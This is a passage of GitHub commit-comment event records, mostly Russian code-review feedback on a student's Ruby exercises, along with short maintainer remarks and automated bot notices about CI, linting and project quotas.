{"id":"8031832949","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29867184,"position":2,"line":8,"path":"Lesson_2/day_serial_number.rb","commit_id":"e9e0e39e9d4515e974552643e1b39c8b58045ce1","created_at":"2018-07-28T07:22:04Z","updated_at":"2018-07-28T07:22:04Z","author_association":"NONE","body":"лучше все же хранить не индекс, \"реальный номер\" месяца\r\nэто более логично, приближенно к реальности, да и переменая называется `month`, а не `month_index`\r\nиндекс стоит вычислять где-то ближе к точке, в которой он понадобится"}},"created_at":"2018-07-28T07:22:04Z"}
{"id":"8031842118","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29867222,"position":13,"line":13,"path":"Lesson_2/four_task.rb","commit_id":"c151293f24ca6fdec041b011b323f2cf197ed3ff","created_at":"2018-07-28T07:29:54Z","updated_at":"2018-07-28T07:29:54Z","author_association":"NONE","body":"по сути ты в этой строке проверяешь влкючен ли текущий элемент списка в другой список\r\n(входит ли буква алфавита в список глассных)\r\n\r\nчтобы проверить включен ли объект в коллекцию, лучше проще всего использовать метод [include?](https://ruby-doc.org/core-2.5.1/Array.html#method-i-include-3F)"}},"created_at":"2018-07-28T07:29:54Z"}
{"id":"8031845376","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29867231,"position":10,"line":10,"path":"Lesson_2/four_task.rb","commit_id":"c151293f24ca6fdec041b011b323f2cf197ed3ff","created_at":"2018-07-28T07:32:25Z","updated_at":"2018-07-28T07:32:25Z","author_association":"NONE","body":"правильней не присваивать всем буквам алфавита номера, а составить хеш только из нужных букв"}},"created_at":"2018-07-28T07:32:25Z"}
{"id":"8031846257","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29867237,"position":16,"line":16,"path":"Lesson_2/four_task.rb","commit_id":"c151293f24ca6fdec041b011b323f2cf197ed3ff","created_at":"2018-07-28T07:33:05Z","updated_at":"2018-07-28T07:33:05Z","author_association":"NONE","body":"вывод нужно упрощать (см. комментарий к задаче про массив с шагом 5)"}},"created_at":"2018-07-28T07:33:05Z"}
{"id":"8031847222","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29867240,"position":6,"line":6,"path":"Lesson_2/four_task.rb","commit_id":"c151293f24ca6fdec041b011b323f2cf197ed3ff","created_at":"2018-07-28T07:33:51Z","updated_at":"2018-07-28T07:33:51Z","author_association":"NONE","body":"в руби стараются не использовать переменные для индекса с \"ручным управлением\"\r\n\r\nпредпочтение отдается использованию \"специальных методов\": [each_with_index](https://ruby-doc.org/core-2.5.1/Enumerable.html#method-i-each_with_index) или [each.with_index(n)](https://ruby-doc.org/core-2.5.1/Enumerator.html#method-i-with_index)\r\n\r\nпро использование второго из этих методов можно почитать к примеру в ответе на [вопрос про each.with_index(n) на СО](https://stackoverflow.com/questions/20258086/difference-between-each-with-index-and-each-with-index-in-ruby)"}},"created_at":"2018-07-28T07:33:51Z"}
{"id":"8031849107","type":"CommitCommentEvent","actor":{"login":"Gosline01"},"repo":{"name":"Goslingz/test"},"payload":{"comment":{"id":29867245,"position":null,"line":null,"path":null,"commit_id":"6c1194b0b5ff03b8e1518a0381721ae44ee0b528","created_at":"2018-07-28T07:35:30Z","updated_at":"2018-07-28T07:35:30Z","author_association":"NONE","body":"Good！！！"}},"created_at":"2018-07-28T07:35:30Z"}
{"id":"8031849702","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29867251,"position":5,"line":22,"path":"Lesson_2/month_day30.rb","commit_id":"76fc6abb32db9c4c44ae68c6641a92041820ca9d","created_at":"2018-07-28T07:36:02Z","updated_at":"2018-07-28T07:36:02Z","author_association":"NONE","body":"здесь лучше использовать постфиксный \"иф\"\r\n\r\nв руби не рекомендуют использовать `if / end` блоки без `else` ветви, если код умещается на одной строке\r\nдля такого случая предпочтение отдается \"постфиксной\" форме `if`\r\nдругими словами вместо\r\n```ruby {.line-numbers}\r\n    if a > b\r\n      do_something\r\n    end\r\n```\r\nрекомендуется писать\r\n```ruby {.line-numbers}\r\n    do_something if a > b\r\n```\r\n\r\nможно и нужно использовать префиксный if (до тела), если:\r\n- код, выполняемый по условию сложный (в несколько строк)\r\n- код занимает одну строку, но она длинаая\r\n"}},"created_at":"2018-07-28T07:36:02Z"}
{"id":"8031850248","type":"CommitCommentEvent","actor":{"login":"AShalysh"},"repo":{"name":"AShalysh/ruby_tasks"},"payload":{"comment":{"id":29867253,"position":10,"line":15,"path":"lesson8/validation.rb","commit_id":"a67dfb92f2cc9b9d444a8b5013def92ae1bc1d80","created_at":"2018-07-28T07:36:30Z","updated_at":"2018-07-28T07:36:30Z","author_association":"OWNER","body":"хорошо)"}},"created_at":"2018-07-28T07:36:30Z"}
{"id":"8031850633","type":"CommitCommentEvent","actor":{"login":"jovace389"},"repo":{"name":"jovace389/run"},"payload":{"comment":{"id":29867254,"position":null,"line":null,"path":null,"commit_id":"8efb0059de444e657a5bc4e5ea5bcc7ac9df3f4d","created_at":"2018-07-28T07:36:50Z","updated_at":"2018-07-28T07:36:50Z","author_association":"OWNER","body":"ok ill try my best to do it\r\n"}},"created_at":"2018-07-28T07:36:50Z"}
{"id":"8031850680","type":"CommitCommentEvent","actor":{"login":"alexlamsl"},"repo":{"name":"gruntjs/grunt-contrib-uglify"},"payload":{"comment":{"id":29867255,"position":4,"line":449,"path":"Gruntfile.js","commit_id":"f6f834bb6edcd1340a01053c91042b0bdcde4b97","created_at":"2018-07-28T07:36:53Z","updated_at":"2018-07-28T07:36:53Z","author_association":"CONTRIBUTOR","body":"I made one at #524 in order to make sure CI passes.\r\n\r\nI can ping you in the future before merging if you prefer - I just assumed you would make the necessary additional changes before publishing."}},"created_at":"2018-07-28T07:36:53Z"}
{"id":"8031851420","type":"CommitCommentEvent","actor":{"login":"quank123wip"},"repo":{"name":"Himself65/vscode-luogu"},"payload":{"comment":{"id":29867257,"position":null,"line":null,"path":null,"commit_id":"31880f3dd6c2251bf6746827b69f2d9b6cba84e8","created_at":"2018-07-28T07:37:32Z","updated_at":"2018-07-28T07:37:32Z","author_association":"NONE","body":"6666"}},"created_at":"2018-07-28T07:37:32Z"}
{"id":"8031853521","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29867261,"position":9,"line":9,"path":"Lesson_2/numbers_fibonachi.rb","commit_id":"778e707663805183b24b54e2cae640134f5ccd9b","created_at":"2018-07-28T07:39:16Z","updated_at":"2018-07-28T07:39:16Z","author_association":"NONE","body":"ТЗ: \"Заполнить массив числами фибоначчи до 100\"\r\nобрати внимание - \"до 100\"\r\nвот результат запуска твоей программы:\r\n\r\n```\r\n$ ruby numbers_fibonachi.rb \r\n1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610, 987, 1597, 2584, 4181, 6765, 10946, 17711, 28657, 46368, 75025, 121393, 196418, 317811, 514229, 832040, 1346269, 2178309, 3524578, 5702887, 9227465, 14930352, 24157817, 39088169, 63245986, 102334155, 165580141, 267914296, 433494437, 701408733, 1134903170, 1836311903, 2971215073, 4807526976, 7778742049, 12586269025, 20365011074, 32951280099, 53316291173, 86267571272, 139583862445, 225851433717, 365435296162, 591286729879, 956722026041, 1548008755920, 2504730781961, 4052739537881, 6557470319842, 10610209857723, 17167680177565, 27777890035288, 44945570212853, 72723460248141, 117669030460994, 190392490709135, 308061521170129, 498454011879264, 806515533049393, 1304969544928657, 2111485077978050, 3416454622906707, 5527939700884757, 8944394323791464, 14472334024676221, 23416728348467685, 37889062373143906, 61305790721611591, 99194853094755497, 160500643816367088, 259695496911122585, 420196140727489673, 679891637638612258, 1100087778366101931, 1779979416004714189, 2880067194370816120, 4660046610375530309, 7540113804746346429, 12200160415121876738, 19740274219868223167, 31940434634990099905, 51680708854858323072, 83621143489848422977, 135301852344706746049, 218922995834555169026, 354224848179261915075, 573147844013817084101,\r\n```\r\nвот эти цифры явно больше 100 )))"}},"created_at":"2018-07-28T07:39:16Z"}
{"id":"8031853917","type":"CommitCommentEvent","actor":{"login":"alexlamsl"},"repo":{"name":"gruntjs/grunt-contrib-uglify"},"payload":{"comment":{"id":29867262,"position":null,"line":null,"path":null,"commit_id":"f6f834bb6edcd1340a01053c91042b0bdcde4b97","created_at":"2018-07-28T07:39:35Z","updated_at":"2018-07-28T07:39:35Z","author_association":"CONTRIBUTOR","body":"@XhmikosR I don't intend to do the actual publishing, since I have only put in the code changes required to upgrade to `uglify-js@3.4.x` without any test failures.\r\n\r\nFeel free to pick up from here."}},"created_at":"2018-07-28T07:39:35Z"}
{"id":"8031857141","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29867263,"position":5,"line":5,"path":"Lesson_2/sum_buys.rb","commit_id":"a6a034397857f4fc9bf8b2116a0322005b42e613","created_at":"2018-07-28T07:42:07Z","updated_at":"2018-07-28T07:42:07Z","author_association":"NONE","body":"рекомендуется давать переменным \"говорящие\" имена, чтобы впоследствии было проще читать и понимать код\r\n\r\nмассивов может быть очень много в программе, если все будут называться `arr`, то будет сложно"}},"created_at":"2018-07-28T07:42:07Z"}
{"id":"8031857625","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29867264,"position":5,"line":5,"path":"Lesson_2/sum_buys.rb","commit_id":"a6a034397857f4fc9bf8b2116a0322005b42e613","created_at":"2018-07-28T07:42:26Z","updated_at":"2018-07-28T07:42:26Z","author_association":"NONE","body":"аналогично про хеши ))"}},"created_at":"2018-07-28T07:42:26Z"}
{"id":"8031858144","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"gruntjs/grunt-contrib-uglify"},"payload":{"comment":{"id":29867265,"position":null,"line":null,"path":null,"commit_id":"f6f834bb6edcd1340a01053c91042b0bdcde4b97","created_at":"2018-07-28T07:42:51Z","updated_at":"2018-07-28T07:42:51Z","author_association":"MEMBER","body":"Well, you should be able to publish. Just enable 2FA.\r\n\r\nNote that unless you CC me, I don't watch any repos due to the number of notifications."}},"created_at":"2018-07-28T07:42:51Z"}
{"id":"8031858150","type":"CommitCommentEvent","actor":{"login":"sakshik30"},"repo":{"name":"kkm24132/Healthcare_Analytics"},"payload":{"comment":{"id":29867266,"position":10,"line":8,"path":"README.md","commit_id":"8bd877f4aaf555a8a126ee3e86cf7a7480a5195c","created_at":"2018-07-28T07:42:51Z","updated_at":"2018-07-28T07:42:51Z","author_association":"COLLABORATOR","body":"Sakshi Chopra [sakshi.kurkreja@outlook.com]"}},"created_at":"2018-07-28T07:42:51Z"}
{"id":"8031858441","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29867267,"position":6,"line":6,"path":"Lesson_2/sum_buys.rb","commit_id":"a6a034397857f4fc9bf8b2116a0322005b42e613","created_at":"2018-07-28T07:43:06Z","updated_at":"2018-07-28T07:43:06Z","author_association":"NONE","body":"`whiel true` лучше заменить `loop do`\r\n\"вайл\" рекомендуется использовать с условием"}},"created_at":"2018-07-28T07:43:06Z"}
{"id":"8031859059","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"gruntjs/grunt-contrib-uglify"},"payload":{"comment":{"id":29867268,"position":4,"line":449,"path":"Gruntfile.js","commit_id":"f6f834bb6edcd1340a01053c91042b0bdcde4b97","created_at":"2018-07-28T07:43:37Z","updated_at":"2018-07-28T07:43:37Z","author_association":"MEMBER","body":"Unless you ping someone/request review, making a PR and merging it yourself, is not considered a review process..."}},"created_at":"2018-07-28T07:43:37Z"}
{"id":"8031859529","type":"CommitCommentEvent","actor":{"login":"hit9"},"repo":{"name":"gevent/gevent"},"payload":{"comment":{"id":29867269,"position":2,"line":8,"path":"CHANGES.rst","commit_id":"6c26ac16167c54aa5747e3595b17554fa4e376c7","created_at":"2018-07-28T07:44:00Z","updated_at":"2018-07-28T07:44:00Z","author_association":"NONE","body":"Date to release?\r\n\r\nWaiting, hopefully"}},"created_at":"2018-07-28T07:44:00Z"}
{"id":"8031859667","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29867270,"position":15,"line":15,"path":"Lesson_2/sum_buys.rb","commit_id":"a6a034397857f4fc9bf8b2116a0322005b42e613","created_at":"2018-07-28T07:44:06Z","updated_at":"2018-07-28T07:44:06Z","author_association":"NONE","body":"лучше вложенный хеш разбить на 2 значения, с ключами  :price и :quantity к примеру, то есть не использовать вводимые юзером значения как ключи\r\nтакой вариант:\r\n```ruby\r\n  cart[item_name] = { price: price, amount: amount }\r\n```"}},"created_at":"2018-07-28T07:44:06Z"}
{"id":"8031860553","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29867271,"position":15,"line":15,"path":"Lesson_2/sum_buys.rb","commit_id":"a6a034397857f4fc9bf8b2116a0322005b42e613","created_at":"2018-07-28T07:44:51Z","updated_at":"2018-07-28T07:44:51Z","author_association":"NONE","body":"хеши нужны  и используются в основном из-за того, что это \"именованные коллекции\", т.е. если мы имеем  хеш знаем ключи, мы по ключам всегда из него получаем значение...\r\nесли же написать хеш так: `{ price => amount }`, то по сути в каждом новом хеше будет свой ключ.. равный введенному пользователем значению `price`\r\nзачем тогда использовать хеш?\r\nключ все равно неизвестен, обратиться за информацией по нему не можем\r\nв общем, если хранить информацию в хеше, то лучше ее хранить под ключами"}},"created_at":"2018-07-28T07:44:51Z"}
{"id":"8031861131","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29867279,"position":15,"line":15,"path":"Lesson_2/sum_buys.rb","commit_id":"a6a034397857f4fc9bf8b2116a0322005b42e613","created_at":"2018-07-28T07:45:16Z","updated_at":"2018-07-28T07:45:16Z","author_association":"NONE","body":"это облегчает чтение кода\r\nесли я вижу такую строку\r\n```ruby\r\ncart[item_name][price]\r\n```\r\nя уже догадываюсь, что за значение я получу"}},"created_at":"2018-07-28T07:45:16Z"}
{"id":"8031862273","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29867285,"position":15,"line":15,"path":"Lesson_2/sum_buys.rb","commit_id":"a6a034397857f4fc9bf8b2116a0322005b42e613","created_at":"2018-07-28T07:46:11Z","updated_at":"2018-07-28T07:46:11Z","author_association":"NONE","body":"плюс, если я знаю что структура одинаковая для каждого элемента, то я к любому элементу могу обратиться и быть уверенным, что под определенными ключами лежат нужные мне значения"}},"created_at":"2018-07-28T07:46:11Z"}
{"id":"8031863201","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29867286,"position":20,"line":20,"path":"Lesson_2/sum_buys.rb","commit_id":"a6a034397857f4fc9bf8b2116a0322005b42e613","created_at":"2018-07-28T07:46:59Z","updated_at":"2018-07-28T07:46:59Z","author_association":"NONE","body":"если поменять структуру хранения согласно рекомендациям выше, то вложенный цикл не понадобится"}},"created_at":"2018-07-28T07:46:59Z"}
{"id":"8031864541","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29867287,"position":26,"line":26,"path":"Lesson_2/sum_buys.rb","commit_id":"a6a034397857f4fc9bf8b2116a0322005b42e613","created_at":"2018-07-28T07:48:03Z","updated_at":"2018-07-28T07:48:03Z","author_association":"NONE","body":"нет смысла два раза проходить по одной и той же коллекции\r\nвесь функционал можно реализовать за один проход итераторы из 18 строки и из 26 друг-друга дублируют"}},"created_at":"2018-07-28T07:48:03Z"}
{"id":"8031866334","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29867292,"position":null,"line":null,"path":null,"commit_id":"bf7c781c73c13b47354c6175d63acef02b9aeb7b","created_at":"2018-07-28T07:49:29Z","updated_at":"2018-07-28T07:49:29Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 725](https://travis-ci.org/per1234/arduino-ci-script/builds/409221712) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00725-001-tsv"}},"created_at":"2018-07-28T07:49:29Z"}
{"id":"8031866492","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29867293,"position":null,"line":null,"path":null,"commit_id":"bf7c781c73c13b47354c6175d63acef02b9aeb7b","created_at":"2018-07-28T07:49:37Z","updated_at":"2018-07-28T07:49:37Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 725](https://travis-ci.org/per1234/arduino-ci-script/builds/409221712) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00725"}},"created_at":"2018-07-28T07:49:37Z"}
{"id":"8031866582","type":"CommitCommentEvent","actor":{"login":"deepuashokan85"},"repo":{"name":"deepuashokan85/apss-automation"},"payload":{"comment":{"id":29867294,"position":null,"line":null,"path":null,"commit_id":"59ed0999c12583c7187f67ba8debaa693598900d","created_at":"2018-07-28T07:49:42Z","updated_at":"2018-07-28T07:49:42Z","author_association":"OWNER","body":"Put the test output"}},"created_at":"2018-07-28T07:49:42Z"}
{"id":"8031866800","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29867296,"position":35,"line":35,"path":"Lesson_2/sum_buys.rb","commit_id":"a6a034397857f4fc9bf8b2116a0322005b42e613","created_at":"2018-07-28T07:49:54Z","updated_at":"2018-07-28T07:49:54Z","author_association":"NONE","body":"слишком сложно\r\nплюс это третья итерация по коллекции в дополнение к итерациям 18 и 26 строки (\"инджект\" проходит по коллекции, как и обычный итератор)\r\nповторюсь - все нужно сделать в одном итераторе"}},"created_at":"2018-07-28T07:49:54Z"}
{"id":"8031867586","type":"CommitCommentEvent","actor":{"login":"M-griffin"},"repo":{"name":"M-griffin/Oblivion2-XRM"},"payload":{"comment":{"id":29867305,"position":null,"line":null,"path":null,"commit_id":"f5313efba722a7ddb62a5c0f87e428ed4614979c","created_at":"2018-07-28T07:50:34Z","updated_at":"2018-07-28T07:50:34Z","author_association":"OWNER","body":"Almost forgot, updated SQL query - When using ORDER BY, the ASC needs to go after the COLLATE NOCASE"}},"created_at":"2018-07-28T07:50:34Z"}
{"id":"8031867713","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Beinqberry/ShopGUI"},"payload":{"comment":{"id":29867306,"position":null,"line":null,"path":null,"commit_id":"81174d03abc22a08750b691c73a38fcc9e024fb8","created_at":"2018-07-28T07:50:40Z","updated_at":"2018-07-28T07:50:40Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Beinqberry/ShopGUI/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `eb70a678-923a-11e8-80b2-c540f6d40da3`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-28T07:50:40Z"}
{"id":"8031868746","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"perl6/ecosystem"},"payload":{"comment":{"id":29867310,"position":null,"line":null,"path":null,"commit_id":"1f93177cbe39fbfc082de3d105722695f8dbdbde","created_at":"2018-07-28T07:51:37Z","updated_at":"2018-07-28T07:51:37Z","author_association":"CONTRIBUTOR","body":"It might be better to revert this while you fix the other... "}},"created_at":"2018-07-28T07:51:37Z"}
{"id":"8031869573","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29867315,"position":null,"line":null,"path":null,"commit_id":"f8ce85246c00411fcb21d025b0fb42abab81c7d5","created_at":"2018-07-28T07:52:18Z","updated_at":"2018-07-28T07:52:18Z","author_association":"COLLABORATOR","body":"Puzzle `449-27d8c19e` discovered in   [`docker/dc-volumes.yml`](  https://github.com/fidals/shopelectro/blob/master/docker/dc-volumes.yml)   and submitted as #457. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-28T07:52:18Z"}
{"id":"8031869636","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29867316,"position":null,"line":null,"path":null,"commit_id":"f8ce85246c00411fcb21d025b0fb42abab81c7d5","created_at":"2018-07-28T07:52:22Z","updated_at":"2018-07-28T07:52:22Z","author_association":"COLLABORATOR","body":"Puzzle `449-eceaf6dd` discovered in   [`docker/docker-compose.yml`](  https://github.com/fidals/shopelectro/blob/master/docker/docker-compose.yml)   and submitted as #458. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-28T07:52:22Z"}
{"id":"8031869698","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29867317,"position":null,"line":null,"path":null,"commit_id":"f8ce85246c00411fcb21d025b0fb42abab81c7d5","created_at":"2018-07-28T07:52:25Z","updated_at":"2018-07-28T07:52:25Z","author_association":"COLLABORATOR","body":"Puzzle `449-03f4ab2a` discovered in   [`shopelectro/tests/tests_selenium.py`](  https://github.com/fidals/shopelectro/blob/master/shopelectro/tests/tests_selenium.py)   and submitted as #459. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-28T07:52:25Z"}
{"id":"8031870131","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/stroyprombeton"},"payload":{"comment":{"id":29867319,"position":null,"line":null,"path":null,"commit_id":"e0af65d87bc561b9c9cc9d5e8a7cd35dc9152c6a","created_at":"2018-07-28T07:52:46Z","updated_at":"2018-07-28T07:52:46Z","author_association":"COLLABORATOR","body":"Puzzle `257-f16bf56d` disappeared from [`stroyprombeton/settings/base.py`](https://github.com/fidals/stroyprombeton/blob/master/stroyprombeton/settings/base.py), that's why I closed #266. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-28T07:52:46Z"}
{"id":"8031870205","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/stroyprombeton"},"payload":{"comment":{"id":29867320,"position":null,"line":null,"path":null,"commit_id":"e0af65d87bc561b9c9cc9d5e8a7cd35dc9152c6a","created_at":"2018-07-28T07:52:50Z","updated_at":"2018-07-28T07:52:50Z","author_association":"COLLABORATOR","body":"Puzzle `266-0bc83b3c` discovered in   [`stroyprombeton/tests/tests_selenium_admin.py`](  https://github.com/fidals/stroyprombeton/blob/master/stroyprombeton/tests/tests_selenium_admin.py)   and submitted as #274. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-28T07:52:50Z"}
{"id":"8031874687","type":"CommitCommentEvent","actor":{"login":"girname"},"repo":{"name":"girname/gitname"},"payload":{"comment":{"id":29867328,"position":null,"line":null,"path":null,"commit_id":"43600f6f91e39f1209b8b6698d7b198eec6a69a4","created_at":"2018-07-28T07:56:44Z","updated_at":"2018-07-28T07:56:44Z","author_association":"OWNER","body":"wwe"}},"created_at":"2018-07-28T07:56:44Z"}
{"id":"8031876857","type":"CommitCommentEvent","actor":{"login":"ianklatzco"},"repo":{"name":"ddrillini/stepminia"},"payload":{"comment":{"id":29867333,"position":4,"line":10,"path":"src/main_game_loop/main.cpp","commit_id":"2585c32628f92d25887ada083eeeec9a3d7117df","created_at":"2018-07-28T07:58:37Z","updated_at":"2018-07-28T07:58:37Z","author_association":"CONTRIBUTOR","body":"pls `#ifdef _WIN32` window-specific stuff"}},"created_at":"2018-07-28T07:58:37Z"}
{"id":"8031877069","type":"CommitCommentEvent","actor":{"login":"B0RYS"},"repo":{"name":"Luka967/CSSockets"},"payload":{"comment":{"id":29867336,"position":null,"line":null,"path":null,"commit_id":"03291fd4d08037cb2f0b6923171f8cac01867ab7","created_at":"2018-07-28T07:58:48Z","updated_at":"2018-07-28T07:58:48Z","author_association":"NONE","body":"Hi this is a very good update, it has made my web app 100x more efficient\r\n\r\n"}},"created_at":"2018-07-28T07:58:48Z"}
{"id":"8031882278","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/sunpy-feedstock"},"payload":{"comment":{"id":29867356,"position":null,"line":null,"path":null,"commit_id":"7f8b4ca0d63bfeaf9445a8759f131058e17a024d","created_at":"2018-07-28T08:02:50Z","updated_at":"2018-07-28T08:02:50Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @ehsteve was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-28T08:02:50Z"}
{"id":"8031888393","type":"CommitCommentEvent","actor":{"login":"tnibert"},"repo":{"name":"tnibert/project-camelot"},"payload":{"comment":{"id":29867382,"position":null,"line":null,"path":null,"commit_id":"09121b9e39a55f3618e48bf4a021eb7a61f5d17b","created_at":"2018-07-28T08:07:47Z","updated_at":"2018-07-28T08:07:47Z","author_association":"OWNER","body":"#99"}},"created_at":"2018-07-28T08:07:47Z"}
{"id":"8031889553","type":"CommitCommentEvent","actor":{"login":"Himmelt"},"repo":{"name":"Himmelt/Quorra"},"payload":{"comment":{"id":29867384,"position":null,"line":null,"path":null,"commit_id":"430549a241e2c3e8c3ae682ff74a52912baf4aee","created_at":"2018-07-28T08:08:49Z","updated_at":"2018-07-28T08:08:49Z","author_association":"OWNER","body":"fix #2"}},"created_at":"2018-07-28T08:08:49Z"}
{"id":"8031891405","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"RMHogervorst/lifxr"},"payload":{"comment":{"id":29867386,"position":null,"line":null,"path":null,"commit_id":"6c37fb608513b781baa08a6dfae3b8ababd328af","created_at":"2018-07-28T08:10:25Z","updated_at":"2018-07-28T08:10:25Z","author_association":"NONE","body":"[R/lifx-cloud.R:3:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L3) *style:* **Variable or function name should be snake_case.**\n```r\n​BASE <- \"https://api.lifx.com\"\n^~~~\n```\n[R/lifx-cloud.R:4:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L4) *style:* **Variable or function name should be snake_case.**\n```r\n​VERSION <- \"v1\"\n^~~~~~~\n```\n[R/lifx-cloud.R:8:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L8) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(is.na(key))stop(\"No key found\")\n      ^\n```\n[R/lifx-cloud.R:12:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L12) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(hue < 0 | hue > 360){\n      ^\n```\n[R/lifx-cloud.R:18:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L18) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(value < 0 | value > 1){\n      ^\n```\n[R/lifx-cloud.R:24:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(value < 0 | value > 1){\n      ^\n```\n[R/lifx-cloud.R:31:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L31) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(value < 2500 | value > 9000){\n      